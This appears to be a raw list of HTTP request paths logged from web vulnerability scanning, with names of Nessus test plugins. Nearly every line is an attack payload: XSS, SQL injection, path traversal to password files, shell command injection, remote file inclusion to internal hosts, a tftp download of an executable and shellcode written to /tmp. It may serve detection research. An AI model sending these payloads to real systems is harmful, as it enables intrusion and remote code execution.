zzz_adoconnection{}//\n/examples/jsp/num/shoutbox.php?conf=../\n/rss_transcripts2/\n/rbec2ohx.asp?<script>cross_site_scripting.nasl</script>\n/cgi-perl/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/main.php?stuff=\"&del\\xa0q28776765&rem\\xa0\n/hrttz9fj.exe?<script>document.cookie=\"testtbjy=7334;\"</script>\n/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/6qbynt4f.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd\n<script>document.cookie=\"testttvs=7163;\"</script>\n/i2n4v4rl.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/account/sawmillcl.exe?ho+{complete_version}\n/cgi-bin/more.php?id=1'\n/top.php?stuff=\"&ver;>q76531491&rem;\n/n9xlumt5.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"|ping,-w,10000,-n,1,4.3.2.1|rem,\n/cgi-bin/myevent.php?myevent_path=/etc/passwd\\x00\n/uvazfs7p.aspx?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/examples/jsp/num/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/1r8cfrlf.fts?<script>document.cookie=\"testydan=5106;\"</script>\n/l4fz1dqw.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zmvq66jy.html?<script>cross_site_scripting.nasl</script>\n/pxagj7n7.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/2010.exe\n/edzaia0i.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/pfdispaly.cgi?../../../../../../etc/passwd\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1606871912--\n/examples/jsp/error/snpfiltered.pl?t=c&u=<script>foo</script>\n/examples/jsp/checkbox/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/examples/jsp/num/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/num/direct.php?rf=/etc/passwd\\x00\n/rpxyx07v.pl?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/examples/jsp/cal/secure.php?cfgprogdir=/etc/passwd\\x00\n/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>\n<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/en-us/account/index.php?cid='\n/cacti/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/.htpasswd.sfish/\\\\'\\\\\"\n/fo564rei.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/606wkcop.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/p043snfr.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/w04ukbv54ixz.php3\n/g8nu2yy7.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/js/scripts.php?load=/etc/passwd\\x00\n/manager/faq.php?action=&type=view&s=&id=-1' union select 0,453988391,0,0,0,0,0--\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908834',null,null,null,null --\n/l752x1ry.pl?<script>cross_site_scripting.nasl</script>\n/h21y8w52.idc?<script>cross_site_scripting.nasl</script>\n/webcgi/.passwd\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/9kr0ih0v.php3?<script>document.cookie=\"testzgnm=1183;\"</script>\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/colors/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/main.php?logout=\"&ping;-w;8000;-n;1;4.3.2.1&rem;\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/ipb5ri?\n/towels-0.1/src/scripture.php?pageheaderfile=@rfiurl\n/scripts/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi-bin/profil.php?id=1 <script>foo</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/qgtapzqwsv0;'); function v\n/manager/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/examples/servlets/servlet/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/javascript/htpasswd.gif\n/recordings/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/cgi-win/msmmask.exe?mask=/junk334\n/ghswfouu.do?<script>document.cookie=\"testsqmm=5713;\"</script>\n/faq.php?action=&type=view&s=&id=-1' union select 0,86738267,0,0,0,0,0--\n/static//........................................................................../../../../../../../../etc/passwd\n/search/?sectionidoverride=1&searchtext=<script>alert(document.cookie);</script>\n/cacti/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/static//../../../../../../../../etc/passwd\n/8x6w469u.php3?<script>document.cookie=\"testgfjr=1286;\"</script>\n/profile_subscriptions/\n/smokin'/\n/cacti/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/cacti/shoutbox.php?conf=../\n/javascript/build.exe\n/fnwhrxyd.asp?<script>cross_site_scripting.nasl</script>\n/l13b77e5.aspx?<script>document.cookie=\"testjvvf=7721;\"</script>\n/yef5f3d5.dll?<script>document.cookie=\"testcrcv=6167;\"</script>\n/javascript/htpasswd.xsl\n/j4oqyvga.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j734qobz.asp?<script>cross_site_scripting.nasl</script>\n/bzuf9ozq.do?<script>cross_site_scripting.nasl</script>\n/cart32.exe\n/ju0u7kfo.cfc?<script>cross_site_scripting.nasl</script>\n/eg2u8pbv.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/8t9v8k7x.aspx?<script>document.cookie=\"testhvje=9403;\"</script>\n/en-us/account/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/fo564rei.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6wb70v0b.nsf?<script>cross_site_scripting.nasl</script>\n/vwmg565s.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/scripts/historyframe.html\n/zuihld5m.aspx?<script>cross_site_scripting.nasl</script>\n/index.php?search=<script>foo</script>\n/scriptingzope/\n/en-us/7o5qp766.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/jnv890lt.kspx?<script>cross_site_scripting.nasl</script>\n/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=;rm\\x09q93759833\\x09#\n/en-us/esmozg5d.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ewc3rz1l.exe?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/techstaff_o'brien/\n/main.php?logout=\"&del\\xa0q69712395&rem\\xa0\n/pythonscriptforparsingurlconf/\n/scripts/_xuzlr7swn95.pl\n/autohtml.php?op=modload&mainfile=x&name=/etc/passwd\n/igtf0zon.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vjbrrppi.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.html?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/examples/jsp/cal/wikka.php?wakka=homepage/../../actions/wikkachanges\n/b4vng02k.asp?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/u8yiqilu.mscgi?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/scripts/vhost.php?action=logout&time=1332008519\n/trade_description/\n/help.php?q=\"&ver\\x09>q27972468&rem\\x09\n/recordings/faq.php?action=&type=view&s=&id=-1' union select 0,2033566095,0,0,0,0,0--\n/top.php?stuff=\"&rm\\x09q38641956\\x09#\n/main.php?frm_daynight=q11255988&frm_passwd=&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=&scr_width=\n/en-us/account/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=&ping;-w;11000;-n;1;4.3.2.1&rem;\n/javascript/inter.exe\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/rv98iwjp.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/main.php?stuff=/'\n/iissamples/exair/howitworks/winmsdp.exe\n/phpmyadmin//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd\n/jnt3f86c.exe?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/fo564rei.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/admin/top.php?admindir=/etc/passwd\\x00\n/javascript/secured.exe\n/examples/jsp/num/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/v3axg1p8.do?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/9kr0ih0v.fts?<script>document.cookie=\"testzgnm=1183;\"</script>\n/help.php?q=\"rm q41912626&rem \n/nmw0do67.idc?<script>cross_site_scripting.nasl</script>\n/scripts/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/scripts/xuicksry9grj.cfm\n/scs86g1p.jspa?<script>document.cookie=\"testquyx=2820;\"</script>\n/scripts/vp56.exe?/x+/c+tftp -i 192.168.202.118 get t1oo7zbn hivjyzlc.exe\n/index.php?option=search&searchword=<script>alert(document.cookie);</script>\n/3m5knyc4.nsf?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/e9rx3ya4.do?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"\\x0asleep\\x099\\x09#\n/main.php?logout=\"ver;>q16377729&rem;\n/script_kiddies/\n/8t9v8k7x.cgi?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/?<script>document.cookie=\"testgfjr=1286;\"</script>\n/en-us/odzk29aa.php?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/jsp2/el/popup.php?include_path=/etc/passwd\\x00\n/js/scripts.php?load=/boot.ini\\x00\n/top.php?stuff='\\x0arm\\x09q14875513\\x09#\n/cacti/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/examples/jsp/checkbox/cwmail.exe\n/en-us/account/search=<script>alert('xss')</script>\n/5o9zq43e.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/ybz5rz7a.cfc?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/scripts/zdbyw3dn3gh2.php3\n/nuh3zirz.php3?<script>cross_site_scripting.nasl</script>\n/nhs-prescriptions/\n/jujgxwav.mscgi?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/javascript/document.vb\n/javascript/keygen.exe\n/cacti/sawmill6cl.exe?ho+{complete_version}\n/javascript/site-map.exe\n/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/dda2qr7j.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/scripts/wd7crx47eaml.php3\n/tuwjta1w.cgi?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/manager/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/recordings?username=\"<script>foo</script\n/scripts/%2e./.%2e/winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe 2k1m.exe\n/main.php?logout=;sleep\\x099\\x09#\n/javascript/showcat.exe\n/tuwjta1w.x?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/en-us/jnv890lt.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fc9t54l7.nsf?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/scripts/articles/default.asp?ichannel=duportal_sql_injections2.nasl'&nchannel=articles\n/cgi-bin/main.php?g2_itemid=../../../../../license\\x00\n/affich.php?image=<script>alert(document.cookie)</script>\n/main.php?stuff=\"sleep 8 #\n/phpinfo.php?globals[test]=<script>alert(document.cookie);</script>\n/scripts/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ht3beygc]));die;/*\n/82q7ywa8.php3?<script>document.cookie=\"testpwew=1315;\"</script>\n/javascript/pw.exe\n/examples/jsp/checkbox/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/subscriptions.c\n/main.php?logout=\\x0auname >q81267386 #\n/examples/jsp/error/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/scripts/catalog.php?action=category_show&id='\n/scripts/admin/configset.php?settings_dir=/etc/passwd\\x00\n/n1afe1y6.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jdx255ea.idc?<script>document.cookie=\"testziyq=5055;\"</script>\n/top.php?stuff='&uname\\x09>q76725442\\x09#\n/obpasswd/\n/bzuf9ozq.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&del q11415113 #\n/javascript/100.exe\n/top.php?stuff=\"&del\\x0bq72181135&rem\\x0b\n/transcript_lewis2/\n/iv5vkgam.do?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/core/editor.php?editor_insert_bottom=/etc/passwd\n/scripts/index.php?edit=nonexistant524754704\n/main.php?logout=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/82q7ywa8.idc?<script>document.cookie=\"testpwew=1315;\"</script>\n<script>document.cookie=\"testuhsv=9753;\"</script>\n/examples/jsp/sessions/al_initialize.php?alpath=/etc/passwd\\x00\n/mpcgi/ppdscgi.exe\n/help.php?q=\"\\x0arm q61288617 #\n/manager/index.php?id='\n/de3v2dd9.pl?<script>cross_site_scripting.nasl</script>\n/en-us/jnv890lt.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('vulnerable')</script>&lt;/script&gt;\n/clk;62378973;7163019;t/\n/main.php?stuff=\"uname >q22289594 #\n/top.php?stuff=\"&del;q62612992&rem;\n/admin/common/script.js.php.bak\n/index.php?id='union/**/select/**/0,0,661699354,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/9o6g5vkn.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/include/sql.php?include_path=/etc/passwd\\x00\n/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/examples/jsp/cal/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/en-us/33y9gcqq.x?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/j4rdyhw8.exe?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/h5sc3gxy.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/sawmillcl.exe?ho+{complete_version}\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,255056503,0,0,0,0,0--\n/en-us/account/index.php?id=_pb9wansu9'\n/scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/p043snfr.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t578vqea.do?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/servlets/servlet/javascript.php?abs_path=/etc/passwd\\x00\n/zv8tv7h8.html?<script>document.cookie=\"testcqwz=9752;\"</script>\n/n1afe1y6.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testcrcv=6167;\"</script>\n/store.php?crn=42'&action=show&show_products_mode=cat_click\n/scripts/index.php?op=disp&filedata=c3lzdgvtkcdpzccpow==\n/cgi-bin/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/5o9zq43e.htm?<script>cross_site_scripting.nasl</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904224)</script>\n/scripts/lg.php\n/8x6w469u.do?<script>document.cookie=\"testgfjr=1286;\"</script>\n/scripts/calendar.php?month=' union select 1,1,'1332008331','calendarix_month_sql_injection.nasl',1 #\n/examples/jsp/jsp2/el/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\"&del\\x09q61351616\\x09#\n/phpmyadmin/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/qczkquis.cgi?<script>document.cookie=\"testkwlg=5591;\"</script>\n/recordings/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/cgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/javascript/forms.exe\n/scripts/msmmask.exe?mask=/nessus517953225.asp\n/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/ny1b3qq4.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.jspa?<script>cross_site_scripting.nasl</script>\n/d765w06j.asp?<script>cross_site_scripting.nasl</script>\n/books-manuscripts_w0qqfromzr4qqsacatz2195qqsocmdzlistingitemlistqqsspagenamezdcpantiquestextnonfeat/\n/static//./../../../../../../../.windows/win.ini\n/m5103snj.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ver\\xa0>q88986355&rem\\xa0\n/en-us/account/faq.php?action=&type=view&s=&id=-1' union select 0,1253662444,0,0,0,0,0--\n/d44uk9h2.jspa?<script>document.cookie=\"testmybc=2088;\"</script>\n/n9xlumt5.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n.../../../../../../../../../../etc/passwd\n/b1q8bywu.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/scripts/info.php\n/javascript/ma.exe\n/scripts/rihzp7swr3p6.shtml\n/mv8wxfy9.jsp?<script>document.cookie=\"testrhbc=8184;\"</script>\n/static//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/etc/passwd\n/5qnlm5z2.idc?<script>document.cookie=\"testsixi=8451;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+w+0+>>esbq\n/bible black new testament - first scripture/\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??\n/quagynka.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6dlc2zm9.html?<script>document.cookie=\"testqpux=4016;\"</script>\n/main.php?stuff=|ping;-w;7000;-n;1;4.3.2.1|rem;\n/examples/servlets/servlet/admin/configset.php?settings_dir=/etc/passwd\\x00\n/cacti/notify?from=nessus\"|id\"\n/javascript/is.exe\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/2aibfaczmac8?'\n/cgi-perl/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/main.php?stuff=\\x0auname >q46175929 #\n/u8yiqilu.asp?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/en-us/<script>cross_site_scripting.nasl</script>.aspx\n/odzk29aa.idc?<script>document.cookie=\"testtfvh=2141;\"</script>\n/test.php?evalme=eval($_server[http_x_popbgbkzviejo]);\n/main.php?logout='\\x0asleep 10 #\n/_vti_bin/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/6qbynt4f.aspx?<script>cross_site_scripting.nasl</script>\n/script/menu/menuadministration.php?path_inc=http://cirt.net/rfiinc.txt?\n/examples/jsp/sessions/doc/index.php?s=/etc/passwd\\x00\n/examples/jsp/jsp2/el/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/javascript/document.orig\n/manual/help/help?helpdir=../../setup/locale/resources&token=frame-title-text&mapfile=dssetupresources.properties&debug=1\n/clk;59237939;7163019;v/\n/en-us/account/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/eei78ore.jspa?<script>cross_site_scripting.nasl</script>\n/qhvu0pdg.exe?<script>document.cookie=\"testchuc=2100;\"</script>\n/?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/igtf0zon.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/<script>document.cookie=\"testviqu=1270;\"</script>\n/init.php?scriptpath=@rfiurl?scriptpath=@rfiurl?\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161\n/nyvbv05h.kspx?<script>document.cookie=\"testftxz=5980;\"</script>\n/javascript/pear.exe\n/nyvbv05h.fts?<script>document.cookie=\"testftxz=5980;\"</script>\n/forum1.asp?n=1753&amp;nn=/..../boot.ini\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/cal/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/scripts/inc/header.php/step_one.php?server_inc=http://xxxx./\n/main.php?stuff=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/num/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/scs86g1p.jsp?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/javascript/rest.exe\n/edzaia0i.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pandora's jar/\n/vwmg565s.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/ap58k3ci.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6wb70v0b.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/pull.exe\n/jackrabbit/search.jsp?q=%\"<script>alert(1331905049)</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0344\\0335\\0211\\0340j\\0020pr\" >> /tmp/urcppbumwm0;echo|awstats490058.txt\n/examples/servlets/servlet/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/byrg33fw.idc?<script>document.cookie=\"testexuu=5340;\"</script>\n/read/search/results?words=nessus\"><script>alert('listmanager_words_xss.nasl')</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1332008324)</script>\n/javascript/demo.exe\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/no4ghqiguzhst?\n/examples/jsp/jsp2/jspx/index.php?cat='\n/phpmyadmin/export.php?what=../../../../../../../../../../etc/passwd\\x00\n/bzuf9ozq.exe?<script>cross_site_scripting.nasl</script>\n/ju0u7kfo.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/mission.exe\n/subscriptionloginm/\n/javascript/14.exe\n/scripts/h3d1n9eaqxv3.php3\n/manager/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/m2fpztty.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/shopaddtocart.asp?productid='42\n/main.php?logout=rm;q49877598&rem;\n/javascript/sav.exe\n/newsletter-subscription/\n/scripts/yfmo7jpwvpv1.inc\n/pxagj7n7.idc?<script>cross_site_scripting.nasl</script>\n/j4drbkil.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/h5sc3gxy.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnt3f86c.nsf?<script>document.cookie=\"testcmax=9270;\"</script>\n/3hlysl2x.php3?<script>document.cookie=\"testgjbe=8505;\"</script>\n/6qbynt4f.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/changed.exe\n/main.php?stuff=\"ver,>q33358897&rem,\n/fcgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/include/scripts/export_batch.inc.php?dir=http://cirt.net/rfiinc.txt?\n/en-us/account/ion-p.exe?page=../../../../../etc/passwd\n/homeowner's-insurance/\n/ywaxntrx.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hjdzm96v.dll?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/ywaxntrx.idc?<script>cross_site_scripting.nasl</script>\n/javascript/decryption.exe\n/top.php?stuff=\"&uname\\x09>q38641956\\x09#\n/scripts/www/delivery/ac.php?bannerid=-665+or+1=1\n/top.php?stuff=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/imprimer.asp?no=`/etc/passwd`|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;`&#039;.\n/javascript/w.exe\n/javascript/upload.exe\n/0qhcnefz.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/adidaschentaostbxssports/\n/jnv890lt.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/index.php?op=default&date=200607' union select 1,1782293471,1,1,1,1,1,1,1,1--&blogid=1\n/x7pclv4s.cfm?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/8x6w469u.idc?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/en-us/h5sc3gxy.idc?<script>cross_site_scripting.nasl</script>\n/l4fz1dqw.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/urcppbumwm0;echo|awstats528110.txt\n/javascript/viewsvn.exe\n/help.php?q=\"&rm q86369979 #\n/tuwjta1w.do?<script>document.cookie=\"testpokn=7494;\"</script>\n/169okeyj.cfm?<script>document.cookie=\"testxeoi=3573;\"</script>\n/chpasswd/\n/scripts/quizme.cgi\n/cgi-bin/../abyss.conf\n/help.php?q=ver\\x0c>q37397456&rem\\x0c\n/cgibin/windmail.exe\n/uc3w3bdi.php?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/clk;33734216;7163019;d/\n/vhzmaia2.exe?<script>document.cookie=\"testkogj=3979;\"</script>\n/main.php?logout=;uname >q17429254 #\n/javascript/samples.exe\n/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/cgi-bin/top.php?header=../../../../../../../../etc/passwd\n/recordings/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/tocvirusdescriptions/\n//_mmserverscripts/mmhttpdb.php\n/cgi-local/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/javascript/cgm-web.exe\n/cgi-bin/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/sqlxpressscript/\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://cirt.net/rfiinc.txt?\\x00\n/examples/jsp/jsp2/el/file.php?path=/etc/passwd\\x00\n/0rufe52p.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testzgnm=1183;\"</script>\n/top.php?stuff=&ver >q31522258&rem \n/cgi-win/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/scripts/1hactwocbsuo.cgi\n/jdx255ea.jspa?<script>document.cookie=\"testziyq=5055;\"</script>\n/main.php?stuff=&uname >q43968126 #\n/'.$_server['php_self'].'?act=img&img=change\n/recordings/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/g8nu2yy7.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/jsp/colors/direct.php?rf=/etc/passwd\\x00\n/<script>document.cookie=\"testnago=4518;\"</script>\n/bl8sefdm.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/main.php?logout='&del q65442989 